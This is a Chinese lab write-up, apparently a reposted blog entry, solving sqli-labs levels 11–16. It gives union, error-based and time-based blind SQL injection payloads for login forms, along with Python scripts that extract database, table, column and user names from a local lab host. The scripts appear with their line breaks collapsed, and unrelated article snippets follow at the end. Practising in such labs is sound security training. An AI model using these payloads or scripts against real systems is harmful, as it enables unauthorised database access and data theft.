sqli-labs(3)

11.

看到登录框直接or 1=1

在hackerabar中我们可以看到这里是post传递的数据,在get中用--+来注释后面的内容 因为get中#是用来指导浏览器动作的,--代表注释+是空格,所以这里用#

之后就和get的一样了

1' order by 2 #

order by 3报错

联合注入

1' union select 1,2 #

1‘ union select database(),2#

1' union select 1,group_concat(table_name) from information_schema.tables where table_schema='security' #

1' union select 1,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'#

1' union select 1,group_concat(username) from security.users #

12.

1'没反应尝试”

通过“尝试得到报错知道还要)

1") or 1=1 #

之后一样’

1") union select 1,2 #

1") union select 1,database() #

1") union select 1,group_concat(table_name) from information_schema.tables where table_schema='security' #

1") union select 1,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'#

1") union select 1,group_concat(username) from security.users #

13.

1‘尝试出现报错,知道是1’)

显示登录成功但不会出现提示但是有报错信息使用报错注入,这里使用报错注入我们使用两种报错注入方法

1') and extractvalue(1,concat(0x5c,database()))#

1') and updatexml(1,concat(0x7e,database(),0x7e),1) #

注入得到表名

 1')  and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)#1') and extractvalue(1,concat(0x5c,(select group_concat(table_name) from information_schema.tables where table_schema='security'))) #

注入的列名

1') and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1)
1') and extractvalue(1,concat(0x5c,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')))#

注入的数据

1') and updatexml(1,concat(0x7e,(select group_concat(username) from security.users ),0x7e),1)
1') and extractvalue(1,concat(0x5c,(select group_concat(username) from security.users)))#

14.

对输入框测试发现当输入1“ or 1=1 #登录成功

使用报错注入

1" and updatexml(1,concat(0x7e,database(),0x7e),1)#
1" and extractvalue(1,concat(0x5c,database()))#

得到数据库库名

1" and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)#
1" and extractvalue(1,concat(0x5c,(select group_concat(table_name) from information_schema.tables where table_schema='security')))#

得到表名

1" and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1)#
1" and extractvalue(1,concat(0x5c,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')))#

得到列名

1" and updatexml(1,concat(0x7e,(select group_concat(username) from security.users),0x7e),1)#
1" and extractvalue(1,concat(0x5c,(select group_concat(username) from security.users)))#

15.

当1’ or 1=1#返回登录成功

这里看到如果输入的为错则返回登录失败不会出现报错信息使用布尔盲注

这里我们要知道and 和or的区别 and'两边的条件都为真才会执行 or一边为真就会执行,而这里我们如果没有爆破过用户admin也不在username中那我们就只能使用or,这里的登录框根据经验第一个肯定是获取username的

admin' and (substr(database(),1,1)='s')#
1' or (substr(database(),1,1)='s')#

1' or (substr(database(),1,1)='a')#

这里成功和失败只会返回不同的照片对于脚本来说没有很明显的特征我们使用sleep来写脚本

import requests,time
def database():data_base = ''charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"while True:for char in charset:payload = {"uname":f"1' or if(substr(database(),{len(data_base) +1},1)='{char}',sleep(2),0)#","passwd":"123456"}url = "http://192.168.1.200:86/Less-15/"start_time = time.time()rsp = requests.post(url,data=payload)end_stime = time.time()rsp_time = end_stime - start_time#print(f"耗时:{rsp_time}")if rsp_time > 2:data_base += charprint(f"数据库名为:{data_base}")breakelse:breakreturn data_basedatas = database()
print(f"最终数据库名为:{datas}")
1' or if(substr((select group_concat(table_name) from information_schema.tables where table_schema='security' limit 0,1),1,1)='e',sleep(5),0)#

   

def tablename():table_name = ''charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"while True:for char in charset:payload = {"uname":f"1' or if(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),{len(table_name) +1},1)='{char}',sleep(2),0)#","passwd":"123456"}url = "http://192.168.1.200:86/Less-15/"start_time = time.time()rsp = requests.post(url,data=payload)end_stime = time.time()rsp_time = end_stime - start_timeif rsp_time > 2:table_name += charprint(f"表名为:{table_name}")breakelse:breakreturn table_nametables = tablename()
print(f"最终表名为:{tables}")

1' or if(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1)='i',sleep(5),0)#

def  columnname():column_name = ''charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"while True:for char in charset:payload = {"uname":f"1' or if(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),{len(column_name) +1},1)='{char}',sleep(2),0)#","passwd":"123456"}url = "http://192.168.1.200:86/Less-15/"start_time = time.time()rsp = requests.post(url,data=payload)end_time = time.time()rsp_time = end_time - start_timeif rsp_time > 2:column_name += charprint(f"列名为:{column_name}")breakelse:breakreturn column_namecolumns = columnname()
print(f"最终列名为:{columns}")
1' or if(substr((select username from security.users limit 0,1),1,1)='d',sleep(5),0)#

def data():data = ''charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"while True:for char in charset:payload = {"uname":f"1' or if(substr((select username from security.users limit 0,1),{len(data) +1},1)='{char}',sleep(2),0)#","passwd":"123456"}url = "http://192.168.1.200:86/Less-15/"start_time = time.time()rsp = requests.post(url,data=payload)end_time = time.time()rsp_time = end_time - start_timeif rsp_time > 2:data += charprint(f"数据为:{data}")breakelse:breakreturn datadatadata = data()
print(f"最终数据为:{datadata}")
import requests,time
def database():data_base = ''charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"while True:for char in charset:payload = {"uname":f"1' or if(substr(database(),{len(data_base) +1},1)='{char}',sleep(2),0)#","passwd":"123456"}url = "http://192.168.1.200:86/Less-15/"start_time = time.time()rsp = requests.post(url,data=payload)end_stime = time.time()rsp_time = end_stime - start_time#print(f"耗时:{rsp_time}")if rsp_time > 2:data_base += charprint(f"数据库名为:{data_base}")breakelse:breakreturn data_basedatas = database()
print(f"最终数据库名为:{datas}")def tablename():table_name = ''charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"while True:for char in charset:payload = {"uname":f"1' or if(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),{len(table_name) +1},1)='{char}',sleep(2),0)#","passwd":"123456"}url = "http://192.168.1.200:86/Less-15/"start_time = time.time()rsp = requests.post(url,data=payload)end_stime = time.time()rsp_time = end_stime - start_timeif rsp_time > 2:table_name += charprint(f"表名为:{table_name}")breakelse:breakreturn table_nametables = tablename()
print(f"最终表名为:{tables}")def  columnname():column_name = ''charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"while True:for char in charset:payload = {"uname":f"1' or if(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),{len(column_name) +1},1)='{char}',sleep(2),0)#","passwd":"123456"}url = "http://192.168.1.200:86/Less-15/"start_time = time.time()rsp = requests.post(url,data=payload)end_time = time.time()rsp_time = end_time - start_timeif rsp_time > 2:column_name += charprint(f"列名为:{column_name}")breakelse:breakreturn column_name
columns = columnname()
print(f"最终列名为:{columns}")def data():data = ''charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"while True:for char in charset:payload = {"uname":f"1' or if(substr((select username from security.users limit 0,1),{len(data) +1},1)='{char}',sleep(2),0)#","passwd":"123456"}url = "http://192.168.1.200:86/Less-15/"start_time = time.time()rsp = requests.post(url,data=payload)end_time = time.time()rsp_time = end_time - start_timeif rsp_time > 2:data += charprint(f"数据为:{data}")breakelse:breakreturn datadatadata = data()
print(f"最终数据为:{datadata}")

16.

测试发现1" or 1=1 #时登录成功

1") or if(substr(database(),1,1)='s',sleep(5),0 )#

import requests,timedef dataname():data_name = ""chart = "qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890"while True:for char in chart:payload = {"uname":f'1") or if(substr(database(),{len(data_name) +1},1)="{char}",sleep(2),0)#',"passwd":"123456"}url = "http://192.168.1.200:86/Less-16/"start_time =time.time()rsp = requests.post(url,data=payload)end_time = time.time()rsp_time = end_time - start_timeif rsp_time >2:data_name += charprint(f"数据库为:{data_name}")breakelse:breakreturn data_namedatas = dataname()
print(f"最终数据名为:{datas}")

1") or if(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1)='e',sleep(5),0)#

def tablename():table_name = ""chart = "qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890"while True:for char in chart:payload = {"uname":f'1") or if(substr((select table_name from information_schema.tables where table_schema="security" limit 0,1),{len(table_name) +1},1)="{char}",sleep(2),0)#',"passwd":"123456"}url = "http://192.168.1.200:86/Less-16/"start_time =time.time()rsp = requests.post(url,data=payload)end_time = time.time()rsp_time = end_time - start_timeif rsp_time >2:table_name += charprint(f"表名为:{table_name}")breakelse:breakreturn table_nametables = tablename()
print(f"最终表名为:{tables}")

1") or if(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1)='i',sleep(5),0)#

def columnname():column_name = ""chart = "qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890"while True:for char in chart:payload = {"uname":f'1") or if(substr((select column_name from information_schema.columns where table_schema="security" and table_name="users" limit 0,1),{len(column_name) +1},1)="{char}",sleep(2),0)#',"passwd":"123456"}url = "http://192.168.1.200:86/Less-16/"start_time =time.time()rsp = requests.post(url,data=payload)end_time = time.time()rsp_time = end_time - start_timeif rsp_time >2:column_name += charprint(f"字段名为:{column_name}")breakelse:breakreturn column_name    columns =   columnname()
print(f"最终字段名为:{columns}")

1") or if(substr((select username from security.users limit 0,1),1,1)='d',sleep(5),0)#

def data():data = ""chart = "qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890"while True:for char in chart:payload = {"uname":f'1") or if(substr((select username from security.users limit 0,1),{len(data) +1},1)="{char}",sleep(2),0)#',"passwd":"123456"}url =   "http://192.168.1.200:86/Less-16/"start_time =time.time()rsp = requests.post(url,data=payload)end_time = time.time()rsp_time = end_time - start_timeif rsp_time >2:data += charprint(f"数据为:{data}")breakelse:breakreturn datadatas = data()    
print(f"最终数据为:{datas}")

最终脚本

import requests,timedef dataname():data_name = ""chart = "qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890"while True:for char in chart:payload = {"uname":f'1") or if(substr(database(),{len(data_name) +1},1)="{char}",sleep(2),0)#',"passwd":"123456"}url = "http://192.168.1.200:86/Less-16/"start_time =time.time()rsp = requests.post(url,data=payload)end_time = time.time()rsp_time = end_time - start_timeif rsp_time >2:data_name += charprint(f"数据库为:{data_name}")breakelse:breakreturn data_namedatas = dataname()
print(f"最终数据名为:{datas}")def tablename():table_name = ""chart = "qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890"while True:for char in chart:payload = {"uname":f'1") or if(substr((select table_name from information_schema.tables where table_schema="security" limit 0,1),{len(table_name) +1},1)="{char}",sleep(2),0)#',"passwd":"123456"}url = "http://192.168.1.200:86/Less-16/"start_time =time.time()rsp = requests.post(url,data=payload)end_time = time.time()rsp_time = end_time - start_timeif rsp_time >2:table_name += charprint(f"表名为:{table_name}")breakelse:breakreturn table_nametables = tablename()
print(f"最终表名为:{tables}")def columnname():column_name = ""chart = "qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890"while True:for char in chart:payload = {"uname":f'1") or if(substr((select column_name from information_schema.columns where table_schema="security" and table_name="users" limit 0,1),{len(column_name) +1},1)="{char}",sleep(2),0)#',"passwd":"123456"}url = "http://192.168.1.200:86/Less-16/"start_time =time.time()rsp = requests.post(url,data=payload)end_time = time.time()rsp_time = end_time - start_timeif rsp_time >2:column_name += charprint(f"字段名为:{column_name}")breakelse:breakreturn column_name    columns =   columnname()
print(f"最终字段名为:{columns}")def data():data = ""chart = "qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890"while True:for char in chart:payload = {"uname":f'1") or if(substr((select username from security.users limit 0,1),{len(data) +1},1)="{char}",sleep(2),0)#',"passwd":"123456"}url =   "http://192.168.1.200:86/Less-16/"start_time =time.time()rsp = requests.post(url,data=payload)end_time = time.time()rsp_time = end_time - start_timeif rsp_time >2:data += charprint(f"数据为:{data}")breakelse:breakreturn datadatas = data()    
print(f"最终数据为:{datas}")

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/208002.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

【C语法学习】26 - strcmp()函数

文章目录 1 函数原型2 参数3 返回值4 比较机制5 示例5.1 示例1 1 函数原型 strcmp():比较str1指向的字符串和str2指向的字符串,函数原型如下: int strcmp(const char *str1, const char *str2);2 参数 strcmp()函数有两个参数str1和str2&a…

从Github登录的双因子验证到基于时间戳的一次性密码:2FA、OTP与TOTP

Github于2023-03-09推出一项提高软件安全标准的措施,所有在Github上贡献过代码的开发人员在年底前必须完成 2FA(Two-factory authentication,双因子认证)。初听此事之时,不以为意,因为自己之前就知道双因子…

Linux 是否被过誉了?

Linux 是否被过誉了? 有些人眼里,电脑这种东西就应该是华丽丽的桌面,手握鼠标戳戳按钮,键盘只为偶尔打打字,仿佛windows式的桌面形式才是理所应当,GUI才是理所应当,x86才是理所应当&#xff0c…

Os-hackNos-3

Os-hackNos-3 一、主机发现和端口扫描 主机发现,靶机地址192.168.80.145 arp-scan -l端口扫描,开放了22和80端口 nmap -P -sV 192.168.80.145二、信息收集 访问80端口 find the Bug You need extra WebSec翻译 找到Bug 你需要额外的网络安全路径扫描 d…

晶振有哪几种?晶振旁边的两个电容起什么作用?

晶振可以分为普通晶振、温补晶振、压控晶振、恒温晶振、差分晶振。 普通晶振通常用作微处理器的时钟器件,主要应用于那些稳定度要求不要的设备中,例如电视机、微波炉。 温补晶振,在晶振内部采取了对晶体频率、温度特性进行补偿,已…

七天.NET 8操作SQLite入门到实战 - 第三天SQLite快速入门

前言 今天我们花费一个小时快速了解SQLite数据类型、SQLite常用命令和语法。 七天.NET 8操作SQLite入门到实战详细教程 第一天 SQLite 简介第二天 在 Windows 上配置 SQLite环境 EasySQLite项目源码地址 GitHub地址:https://github.com/YSGStudyHards/EasySQLite&…

杭电oj 2064 汉诺塔III C语言

#include <stdio.h>void main() {int n, i;long long sum[35] { 2,8,26 };for (i 3; i < 35; i)sum[i] 3 * sum[i - 1] 2;while (~scanf_s("%d", &n))printf("%lld\n", sum[n - 1]); }

海外应用速度访问慢?试试这个技术解决方案

在数字化转型的时代&#xff0c;企业需要高效、稳定、安全的网络连接来支撑全球化业务的拓展。然而&#xff0c;在进行海外应用访问时&#xff0c;经常会遇到访问速度慢的问题&#xff0c;因为跨国界的网络通信往往存在延迟和带宽限制等问题。在过去&#xff0c;企业通常会使用…

echarts 几千条分钟级别在小时级别图标上展示

需求背景解决效果ISQQW代码地址strategyChart.vue 需求背景 需要实现 秒级数据几千条在图表上显示&#xff0c;(以下是 设计图表上是按小时界别显示数据&#xff0c;后端接口为分钟级别数据) 解决效果 ISQQW代码地址 链接 strategyChart.vue <!--/** * author: liuk *…

使用 Python脚本在3DMAX中加载图像和读取图像中的像素值

如何使用Python在3dmax中加载和显示图像文件&#xff1f;我们先看下面的代码&#xff1a; *测试的3dmax文件和图像文件位于同一目录中。 from MaxPlus import BitmapManagerimage_file_path rje_gray_02_4k.exrbmp_storage MaxPlus.Factory.CreateStorage(17)bmp_info bmp…

7.HTML中列表标签

7.列表标签 7.1无序列表&#xff08;重点&#xff09; 表格是用来显示数据的&#xff0c;那么列表就是用来布局的。 列表最大的特点就是整齐&#xff0c;整洁&#xff0c;有序&#xff0c;他作为布局会更加自由和方便&#xff0c; 根据使用的情景不同&#xff0c;列表可分为三…

O2OA(翱途)开发平台 V8.2已发布,更安全、更高效、更开放

尊敬的 O2OA (翱途) 平台合作伙伴、用户以及亲爱的开发小伙伴们&#xff0c;V8.2 版本已正式发布&#xff0c;大家可以去官网上下载最新版本。 上次 8.1 的发布是在 9 月 1 日&#xff0c;又过去两个多月&#xff0c;O2OA 研发团队始终踏踏实实地做好产品的研发及优化工作&…